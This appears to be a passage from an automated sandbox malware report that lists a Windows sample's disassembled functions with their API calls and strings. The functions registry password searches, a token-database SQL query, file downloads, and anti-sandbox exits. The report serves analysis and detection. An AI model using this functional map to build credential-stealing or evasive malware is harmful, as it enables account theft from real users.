InternetReadFile.WININET(c.A,?,00000400,00000000), ref: 00404D01
InternetCloseHandle.WININET(c.A), ref: 00404D75
InternetCloseHandle.WININET(?), ref: 00404D82

Strings

c.A, xrefs: 00404CC1, 00404DA0
c.A, xrefs: 00404D71, 00404CFD, 00404D00, 00404D74

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID: c.A$c.A
API String ID: 3066467675-270182787
Opcode ID: 8040d54840f692db59013cdd40ccdbc8d9783588730a8293b5e11376e1307bfa
Instruction ID: 93472a029acc8278824907ab7d145ea178407da7df790c597300061c638fc298
Opcode Fuzzy Hash: 8040d54840f692db59013cdd40ccdbc8d9783588730a8293b5e11376e1307bfa
Instruction Fuzzy Hash: 3731F8F4A00218ABDB20DF54DD85BDDB7B5BB88304F5081D9F709A7280DB746AC58F98

Uniqueness

Uniqueness Score: -1.00%

Function 00406CA0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00406CE4
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00406D0A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00406D81
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00406DDD
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E22
HeapFree.KERNEL32(00000000,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406E29

Part of subcall function 00408C20: vsprintf_s.MSVCRT ref: 00408C3B

task.LIBCPMTD ref: 00406F25

Strings

Password, xrefs: 00406DD1

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
String ID: Password
API String ID: 2698061284-3434357891
Opcode ID: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction ID: 212e66a44237aadac39c144ffd634e87161c2b2b5cb707631054264fe3c499ea
Opcode Fuzzy Hash: e5b433d59e683e3853dabaec4553a197e9f76ed1b5df22dde85a26ca8bf12c56
Instruction Fuzzy Hash: 4F613FB5D042589BDB24DB50CC45BDAB7B8BF44304F0081EAE64AA6281DF746FC9CF95

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

:, xrefs: 004141F9
\, xrefs: 004141FD
C, xrefs: 004141E9

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 6ca11245975395cfb749b767d31339a8af53aa26318921bdecc0eb4ed934f432
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 00409426, 00409449, 00409429, 0040946F
'@, xrefs: 004093C3, 00409486

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: File$Local$AllocChangeCloseCreateFindFreeNotificationReadSize
String ID: '@$'@
API String ID: 1815715184-345573653
Opcode ID: 3e2cb138ec7cdfd225a0831a4534633d8e60494a88031d88bfd39ee4014c57ab
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: 3e2cb138ec7cdfd225a0831a4534633d8e60494a88031d88bfd39ee4014c57ab
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02F55428,00000000,?,0041D774,00000000,?,00000000,00000000,?,02F55410), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

%d MB, xrefs: 004149E0
@, xrefs: 0041498A

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2886426298-3474575989
Opcode ID: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction ID: f510475f390b20142bb5ad9b480526056b42ea6839ab7368ec165d8bd78ed5c1
Opcode Fuzzy Hash: f62cb7ad2578be9c21b89e6e1bf921e4f1007482674ad6998ac9b57a816d1492
Instruction Fuzzy Hash: 84111EB0D40208ABDB10DFE4CC49FAE77B8BB48704F104549F715BB284D7B8A9418B99

Uniqueness

Uniqueness Score: -1.00%

Function 00405D40 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

InternetOpenA.WININET(0041D7D3,00000001,00000000,00000000,00000000), ref: 00405DAF
StrCmpCA.SHLWAPI(?,02F516B8), ref: 00405DE7
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00405E2F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00405E53
InternetReadFile.WININET(00410E73,?,00000400,?), ref: 00405E7C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00405EAA
FindCloseChangeNotification.KERNEL32(?,?,00000400), ref: 00405EE9
InternetCloseHandle.WININET(00410E73), ref: 00405EF3
InternetCloseHandle.WININET(00000000), ref: 00405F00

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Internet$CloseFile$HandleOpen$ChangeCrackCreateFindNotificationReadWritelstrcpylstrlen
String ID:
API String ID: 729276229-0
Opcode ID: 4e7ead54d555d14e744e7ff47a0c67cc076e07af827d292d55a4a691b0a032ea
Instruction ID: 46018c2d0393d599e49b8942d3c4f4431f3cc1562104312217daf3d911a1fc92
Opcode Fuzzy Hash: 4e7ead54d555d14e744e7ff47a0c67cc076e07af827d292d55a4a691b0a032ea
Instruction Fuzzy Hash: DB514471A00618ABDB20DF51CC45BEF7779EB44305F1081AAB645B71C0DB78AB85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00413D90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00413D9E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

OpenProcess.KERNEL32(001FFFFF,00000000,00413FCD,0041D28B), ref: 00413DDC
memset.MSVCRT ref: 00413E2A
??_V@YAXPAX@Z.MSVCRT ref: 00413F7E

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00413E4C

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: OpenProcesslstrcpymemset
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 224852652-4138519520
Opcode ID: 008f9f0e69fa7baa2fdd27b85b59380f94fbfe7f68b00d728cddc21e1691aa62
Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
Opcode Fuzzy Hash: 008f9f0e69fa7baa2fdd27b85b59380f94fbfe7f68b00d728cddc21e1691aa62
Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040B250 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 274stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000), ref: 0040B44D

Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552

StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
lstrlen.KERNEL32(00000000), ref: 0040B553
lstrlen.KERNEL32(00000000), ref: 0040B567

Strings

AccountTokens, xrefs: 0040B319
SELECT service, encrypted_token FROM token_service, xrefs: 0040B3BB
AccountTokens, xrefs: 0040B28A
AccountId, xrefs: 0040B472

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 2910778473-1079375795
Opcode ID: a61fba67ecb25ce4c56e4813ca3ca79df658c1855d60b8a7f28f4fc75cff9468
Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
Opcode Fuzzy Hash: a61fba67ecb25ce4c56e4813ca3ca79df658c1855d60b8a7f28f4fc75cff9468
Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00414B79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

RegQueryValueExA.KERNEL32(00000000,02F55308,00000000,000F003F,?,00000400), ref: 00414C89
lstrlen.KERNEL32(?), ref: 00414C9E
RegQueryValueExA.KERNEL32(00000000,02F552A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
RegCloseKey.KERNEL32(00000000), ref: 00414DA5
RegCloseKey.ADVAPI32(00000000), ref: 00414DB7

Strings

%s\%s, xrefs: 00414BEA

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
Opcode Fuzzy Hash: 49bd180f3d19f789d073d9977c9b899b153d1fd3672ba65f9cf7a2d2756c86b8
Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 00411D80 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00411DA5
RegOpenKeyExA.KERNEL32(80000001,02F558C8,00000000,00020119,?), ref: 00411DC4
RegQueryValueExA.ADVAPI32(?,02F56868,00000000,00000000,00000000,000000FF), ref: 00411DE8
RegCloseKey.ADVAPI32(?), ref: 00411DF2
lstrcat.KERNEL32(?,00000000), ref: 00411E17
lstrcat.KERNEL32(?,02F56730), ref: 00411E2B

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00409B30 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
lstrlen.KERNEL32(00000000), ref: 00409F6A

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
DeleteFileA.KERNEL32(00000000), ref: 00409FEB

Strings

X@, xrefs: 00409BC4, 00409BF0, 00409FCD, 00409BC7, 00409BF3, 00409FD0

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: X@
API String ID: 3258613111-2850556465
Opcode ID: 2ce33c4d6bc1c54c02726b9951c26005b468ade56a5d7d73f71a9d5956737672
Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
Opcode Fuzzy Hash: 2ce33c4d6bc1c54c02726b9951c26005b468ade56a5d7d73f71a9d5956737672
Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8

Uniqueness

Uniqueness Score: -1.00%

Function 004136B0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F36CD0), ref: 00415F11
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F36B08), ref: 00415F2A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51478), ref: 00415F42
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51490), ref: 00415F5A
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51340), ref: 00415F73
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51948), ref: 00415F8B
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F4FE80), ref: 00415FA3
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F4FF00), ref: 00415FBC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F514A8), ref: 00415FD4
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51328), ref: 00415FEC
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F513B8), ref: 00416005
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F513A0), ref: 0041601D
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F50200), ref: 00416035
Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02F51370), ref: 0041604E

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1

Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E

Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103

Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254

Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434

Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02F518D8,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F519B8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
CloseHandle.KERNEL32(00000000), ref: 004137B9
Sleep.KERNEL32(00001770), ref: 004137C4
CloseHandle.KERNEL32(?,00000000,?,02F519B8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
ExitProcess.KERNEL32 ref: 004137E2

Memory Dump Source

Source File: 00000001.00000002.2071997124.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2071997124.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2071997124.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5g0.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 1175201934-0
Opcode ID: 3379fc9070de8fc89ebf505f25924ac83e9f2e1d81a2074c3ac0e2491ae88b92
Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
Opcode Fuzzy Hash: 3379fc9070de8fc89ebf505f25924ac83e9f2e1d81a2074c3ac0e2491ae88b92
Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00410FA0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02F31E18,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

